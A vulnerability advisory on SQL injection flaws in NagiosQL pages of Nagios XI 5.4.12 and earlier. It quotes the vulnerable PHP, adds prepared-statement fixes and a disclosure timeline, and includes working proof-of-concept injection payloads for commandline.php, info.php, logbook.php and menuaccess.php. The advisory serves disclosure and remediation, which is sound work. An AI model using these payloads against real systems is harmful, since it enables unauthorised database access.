Nagios XI <= 5.4.12: Multiple SQL Injection Vulnerabilities

Vulnerability Overview

Nagios is a free, open-source network monitoring tool. It monitors the status of Windows, Linux and Unix hosts, network devices such as switches and routers, printers, and so on. When a system or service enters an abnormal state it sends an e-mail or SMS alert so that operations staff are notified immediately, and it sends a recovery notification once the state returns to normal. Nagios XI versions 5.4.12 and earlier contain multiple SQL injection vulnerabilities.

Affected Versions

  • Nagios XI 5.2.x
  • Nagios XI 5.4.x earlier than 5.4.13

Vulnerability Analysis

commandline.php SQL injection (CVE-2018-10735)

nagiosql/admin/commandline.php

<?php
$preNoMain = 1;

require("../functions/prepend_adm.php");
$strCommandLine = "&nbsp;";
$intCount = 0;
//
// Query the database
// ===================
if (isset($_GET['cname']) && ($_GET['cname'] != "")) {
    // $_GET['cname'] is concatenated straight into the query string
    $strResult = $myDBClass->getFieldData("SELECT command_line FROM tbl_command WHERE id='".$_GET['cname']."'");
    if ($strResult != false) {
        $strCommandLine = $strResult;
        $intCount = substr_count($strCommandLine,"ARG");
        if (substr_count($strCommandLine,"ARG8") != 0) {
            $intCount = 8;
        } else if (substr_count($strCommandLine,"ARG7") != 0) {
            $intCount = 7;
        } else if (substr_count($strCommandLine,"ARG6") != 0) {
            $intCount = 6;
        } else if (substr_count($strCommandLine,"ARG5") != 0) {
            $intCount = 5;
        } else if (substr_count($strCommandLine,"ARG4") != 0) {
            $intCount = 4;
        } else if (substr_count($strCommandLine,"ARG3") != 0) {
            $intCount = 3;
        } else if (substr_count($strCommandLine,"ARG2") != 0) {
            $intCount = 2;
        } else if (substr_count($strCommandLine,"ARG1") != 0) {
            $intCount = 1;
        } else {
            $intCount = 0;
        }
    }
}

The cname parameter is not filtered at all: it is concatenated directly into the SQL statement, which results in SQL injection.

PoC
http://xxx/nagiosql/admin/commandline.php?cname='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23

info.php SQL injection (CVE-2018-10736)

nagiosql/admin/info.php

<?php
$preNoMain  = 1;
require("../functions/prepend_adm.php");
//
// Request parameters
// =================
$chkKey1 = isset($_GET['key1']) ? $_GET['key1'] : "";
$chkKey2 = isset($_GET['key2']) ? $_GET['key2'] : "";
$chkVersion = isset($_GET['version']) ? $_GET['version'] : "";
//
// Fetch data
// ===========
// all three GET parameters are interpolated into the query unmodified
$strSQL = "SELECT `infotext` FROM `tbl_info`
    WHERE `key1` = '$chkKey1' AND `key2` = '$chkKey2' AND `version` = '$chkVersion' AND `language` = 'private'";
$strContentDB = $myDBClass->getFieldData($strSQL);
if ($strContentDB == "") {
    $strSQL = "SELECT `infotext` FROM `tbl_info`
        WHERE `key1` = '$chkKey1' AND `key2` = '$chkKey2' AND `version` = '$chkVersion' AND `language` = 'default'";
    $strContentDB = $myDBClass->getFieldData($strSQL);
}
?>

The key1, key2 and version parameters are all unfiltered and concatenated directly into the SQL statement, which results in SQL injection.

PoC
http://xxxx/nagiosql/admin/info.php?key1='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23
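The root cause in both commandline.php and info.php is the same: request values are spliced into the SQL text, so the database parses attacker-controlled characters as syntax. The following is an added example, not NagiosQL or Nagios XI project code, showing how the two queries look when the values are bound as parameters instead. It assumes PHP 7+ and a PDO connection named $pdo to the same MySQL schema (tbl_command, tbl_info); the original $myDBClass->getFieldData() is not used because it only accepts a finished SQL string, which is exactly how the values ended up inside the query.

```php
<?php
// Added example (assumed $pdo, PHP 7+), not project code.

// commandline.php: tbl_command.id is an integer key, so anything that is not a
// positive integer is rejected before the database is contacted at all.
function fetchCommandLine(PDO $pdo, $cname): string
{
    $id = filter_var($cname, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '&nbsp;';                       // the original's "no command" default
    }
    $stmt = $pdo->prepare('SELECT command_line FROM tbl_command WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $line = $stmt->fetchColumn();
    $stmt->closeCursor();
    return is_string($line) ? $line : '&nbsp;';
}

// info.php: key1, key2 and version are free-form strings. As bound parameters,
// quotes, comment markers and UNION keywords stay inside the value; the SQL the
// server parses never changes. The private -> default fallback is kept.
function fetchInfoText(PDO $pdo, string $key1, string $key2, string $version): string
{
    $stmt = $pdo->prepare(
        'SELECT `infotext` FROM `tbl_info`
         WHERE `key1` = :key1 AND `key2` = :key2 AND `version` = :version
           AND `language` = :lang'
    );
    foreach (['private', 'default'] as $lang) {
        $stmt->execute([
            ':key1' => $key1, ':key2' => $key2, ':version' => $version, ':lang' => $lang,
        ]);
        $text = $stmt->fetchColumn();
        $stmt->closeCursor();
        if (is_string($text) && $text !== '') {
            return $text;
        }
    }
    return '';
}

// Usage with the same request parameters as the original pages ($pdo assumed):
// $strCommandLine = fetchCommandLine($pdo, $_GET['cname'] ?? '');
// $strContentDB   = fetchInfoText($pdo, $_GET['key1'] ?? '', $_GET['key2'] ?? '', $_GET['version'] ?? '');
```

Whether PDO is configured with emulated or native server-side prepares, a bound value is transmitted as data, so the PoC payloads above would simply be looked up as literal key or id values and return no row. Validating cname as an integer is an extra, type-level check that is possible because the column is numeric; for the free-form keys of info.php the prepared statement alone is the control.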

logbook.php SQL injection (CVE-2018-10737)

nagiosql/admin/logbook.php

......
$chkFromLine = isset($_GET['from_line']) ? $_GET['from_line']+0 : 0;
$chkDelFrom = isset($_POST['txtFrom']) ? $_POST['txtFrom'] : "";
$chkDelTo = isset($_POST['txtTo']) ? $_POST['txtTo'] : "";
$chkSearch = isset($_POST['txtSearch']) ? $_POST['txtSearch'] : "";
//
// Delete data
// =============
if (isset($_POST['txtFrom']) && (($chkDelFrom != "") || ($chkDelTo != ""))) {
    $strWhere = "";
    if ($chkDelFrom != "") {
        $strWhere .= "AND `time` > '$chkDelFrom 00:00:00'";
    }
    if ($chkDelTo != "") {
        $strWhere .= "AND `time` < '$chkDelTo 23:59:59'";
    }
    $strSQL = "DELETE FROM `tbl_logbook` WHERE 1=1 $strWhere";
    $booReturn = $myDBClass->insertData($strSQL);
    if ($booReturn == false) {
        $strMessage .= _('Error while selecting data from database:')."<br>".$myDBClass->strDBError."<br>";
        $intError = 1;
    } else {
        $strMessage .= _('Dataset successfully deleted. Affected rows:')." ".$myDBClass->intAffectedRows;
    }
}
//
// Data search
// ==========
if ($chkSearch != "") {
    // $_POST['txtSearch'] is interpolated into four LIKE patterns unmodified
    $strWhere = "WHERE `user` LIKE '%$chkSearch%' OR `ipadress` LIKE '%$chkSearch%' OR `domain` LIKE '%$chkSearch%' OR `entry` LIKE '%$chkSearch%'";
} else {
    $strWhere = "";
}
......

The txtSearch parameter is not filtered at all: it is concatenated directly into the SQL statement, which results in SQL injection.

PoC
http://xxxx/nagiosql/admin/logbook.php

postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
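The search in logbook.php has a second subtlety beyond the injection: the user's text lands inside a LIKE pattern, so even after it is bound as a parameter, the characters % and _ still act as wildcards. The following is an added example, not NagiosQL project code, that binds the search value and escapes the LIKE metacharacters; it assumes PHP 7+, a PDO connection named $pdo and the tbl_logbook columns used above.

```php
<?php
// Added example (assumed $pdo, PHP 7+), not project code.

function escapeLikePattern(string $value): string
{
    // MySQL's default LIKE escape character is the backslash: escape it first,
    // then the two wildcards, so "50%" searches for the literal text "50%".
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $value);
}

function searchLogbook(PDO $pdo, string $search, int $fromLine = 0, int $pageSize = 25): array
{
    $sql    = 'SELECT `time`, `user`, `ipadress`, `domain`, `entry` FROM `tbl_logbook`';
    $params = [];
    if ($search !== '') {
        $pattern = '%' . escapeLikePattern($search) . '%';
        // Positional placeholders: with native prepares PDO does not allow one
        // named placeholder to be reused, so the pattern is bound four times.
        $sql .= ' WHERE `user` LIKE ? OR `ipadress` LIKE ? OR `domain` LIKE ? OR `entry` LIKE ?';
        $params = [$pattern, $pattern, $pattern, $pattern];
    }
    // The int type hints guarantee plain integers here, the same idea as the
    // original's `$_GET['from_line']+0`; a bound LIMIT would need PDO::PARAM_INT.
    $sql .= ' ORDER BY `time` DESC LIMIT ' . max(0, $fromLine) . ', ' . max(1, $pageSize);

    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with the original request parameters ($pdo assumed):
// $rows = searchLogbook($pdo, $_POST['txtSearch'] ?? '', (int) ($_GET['from_line'] ?? 0));
```

With the value bound, the error-based PoC above is just a long search string that matches nothing. The wildcard escaping is not a security control in itself, but it closes a common functional gap left behind when a concatenated LIKE is converted to a prepared statement.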

menuaccess.php SQL injection

nagiosql/admin/menuaccess.php

<?php
$preAccess    = 1;
$preFieldvars = 1;
require("../functions/prepend_adm.php");
//
// Request parameters
// =================
$chkSubMenu = isset($_POST['selSubMenu']) ? $_POST['selSubMenu']+0 : 0;
$chkInsKey1 = isset($_POST['chbKey1']) ? $_POST['chbKey1'] : 0;
$chkInsKey2 = isset($_POST['chbKey2']) ? $_POST['chbKey2'] : 0;
$chkInsKey3 = isset($_POST['chbKey3']) ? $_POST['chbKey3'] : 0;
$chkInsKey4 = isset($_POST['chbKey4']) ? $_POST['chbKey4'] : 0;
$chkInsKey5 = isset($_POST['chbKey5']) ? $_POST['chbKey5'] : 0;
$chkInsKey6 = isset($_POST['chbKey6']) ? $_POST['chbKey6'] : 0;
$chkInsKey7 = isset($_POST['chbKey7']) ? $_POST['chbKey7'] : 0;
$chkInsKey8 = isset($_POST['chbKey8']) ? $_POST['chbKey8'] : 0;
//
// Process data
// =================
// the eight checkbox values are concatenated as-is; only selSubMenu is coerced to an integer
$strKeys = $chkInsKey1.$chkInsKey2.$chkInsKey3.$chkInsKey4.$chkInsKey5.$chkInsKey6.$chkInsKey7.$chkInsKey8;
if (isset($_POST['subSave']) && ($chkSubMenu != 0)) {
    $strSQL = "UPDATE `tbl_submenu` SET `access_rights`='$strKeys' WHERE `id`=$chkSubMenu";
    $booReturn = $myDBClass->insertData($strSQL);
    if ($booReturn == false) {
        $strMessage .= _('Error while inserting the data to the data base:')."<br>".$myDBClass->strDBError."<br>";
        $intError = 1;
    } else {
        $strMessage .= _('Data were successfully inserted to the data base!');
        $myDataClass->writeLog(_('Access keys set for menu item:')." ".$myDBClass->getFieldData("SELECT `item` FROM `tbl_submenu` WHERE `id`=$chkSubMenu"));
    }
}
//

The chbKey1 parameter is not filtered at all: it is concatenated directly into the SQL statement, which results in SQL injection. To reach the SQL statement, the subSave parameter must be non-empty and selSubMenu must not be 0.

PoC
http://xxxx/nagiosql/admin/menuaccess.php

postdata:
chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1
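Here the vulnerable value has a very narrow legitimate shape: access_rights is assembled from eight checkbox flags, so the input can be allowlisted before it is used, and the UPDATE can then run as a prepared statement. The following is an added example, not NagiosQL project code, that does both. It assumes PHP 7+ and a PDO connection named $pdo; that a checked box submits "1" is an assumption taken from the original's default of 0 for an absent box.

```php
<?php
// Added example (assumed $pdo, PHP 7+), not project code.

function buildAccessKeys(array $post): string
{
    $keys = '';
    for ($i = 1; $i <= 8; $i++) {
        $value = $post['chbKey' . $i] ?? '0';
        // Strict allowlist: only "0" or "1" are legitimate checkbox values (assumed).
        // Anything else, such as a quote or SQL fragment, is rejected, not coerced.
        if ($value !== '0' && $value !== '1') {
            throw new InvalidArgumentException("chbKey$i must be 0 or 1");
        }
        $keys .= $value;
    }
    return $keys;                               // e.g. "10110000"
}

function saveMenuAccess(PDO $pdo, array $post): ?string
{
    $subMenu = (int) ($post['selSubMenu'] ?? 0); // same integer coercion as the original +0
    if (!isset($post['subSave']) || $subMenu === 0) {
        return null;                            // the original only updates under these conditions
    }
    $keys = buildAccessKeys($post);

    $upd = $pdo->prepare('UPDATE `tbl_submenu` SET `access_rights` = :keys WHERE `id` = :id');
    $upd->bindValue(':keys', $keys, PDO::PARAM_STR);
    $upd->bindValue(':id', $subMenu, PDO::PARAM_INT);
    $upd->execute();

    // The original also logs the menu item's name; it is fetched the same safe way.
    $sel = $pdo->prepare('SELECT `item` FROM `tbl_submenu` WHERE `id` = :id');
    $sel->bindValue(':id', $subMenu, PDO::PARAM_INT);
    $sel->execute();
    $item = $sel->fetchColumn();
    return is_string($item) ? $item : null;
}

// Usage ($pdo assumed): $item = saveMenuAccess($pdo, $_POST);
```

The prepared statement alone would already stop the injection; the allowlist adds a second layer that also keeps garbage out of the access_rights column, which matters because that string is later read back to decide who may see which menu item.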

Fix

  • Upgrade to version 5.4.13.

Timeline

  • May 3, 2018: vulnerabilities discovered
  • May 4, 2018: confirmed that the vendor had already fixed them
  • May 5, 2018: CVE identifiers requested
  • May 17, 2018: vulnerabilities disclosed